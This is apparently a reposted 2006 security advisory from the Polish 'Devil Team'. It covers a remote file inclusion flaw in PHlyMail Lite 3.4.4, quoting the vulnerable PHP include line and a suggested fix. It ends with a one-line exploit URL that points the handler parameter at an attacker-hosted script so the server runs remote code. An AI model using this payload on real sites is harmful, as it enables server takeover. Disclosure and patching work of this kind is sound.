exploits , vulnerabilities , articles , PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability

2006-08-18

PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability

Rated as : High Risk

/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote
File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: PHlyMail Lite v. 3.4.4 (Build 3.04.04)
- [Script site: http://phlymail.de/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-          http://www.devilteam.yum.pl/
-                       and
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne kozysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*
+++++++++++++++++++++START+++++++++++++++++++++++
vulnerable code => handlers/email/mod.listmail.php line 12-25:
....
$use_preview = (isset($_PM_['core']['folders_usepreview']) &&
$_PM_['core']['folders_usepreview']) ? true : false;

$ordfields = array
       ('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv',
'hdate_sent', 'hsize', 'hpriority'
       ,'attachments', 'meta_read', 'meta_type', 'meta_colour'
       );
require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php');
require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php');

// We changed the folder, got to reset the page number to 0
if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder'])
       && $_REQUEST['workfolder'] != $_SESSION['workfolder']) {
   $_SESSION['WPs_pagenum'] = 0;
}
....
+++++++++++++++++++++++++++++++++++++++++++++++++
*/
/*
+++++++++++++++++++++FIX+++++++++++++++++++++++++
handlers/email/mod.listmail.php line 12-25:
Add Line1:
....
if (!defined('_IN_PHM_')) die();
....
$use_preview = (isset($_PM_['core']['folders_usepreview']) &&
$_PM_['core']['folders_usepreview']) ? true : false;

$ordfields = array
       ('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv',
'hdate_sent', 'hsize', 'hpriority'
       ,'attachments', 'meta_read', 'meta_type', 'meta_colour'
       );
require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php');
require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php');

// We changed the folder, got to reset the page number to 0
if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder'])
       && $_REQUEST['workfolder'] != $_SESSION['workfolder']) {
   $_SESSION['WPs_pagenum'] = 0;
}
....
++++++++++++++++++++THE+END++++++++++++++++++++++
*/
#Exploit:

http://www.site.com/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]
securitydot.net - 2006-08-18

Exploits - newest 10 RSS | More

2007-06-15 57089 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34081 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42232 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29246 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19679 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16636 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19334 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16510 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33511 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17162 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit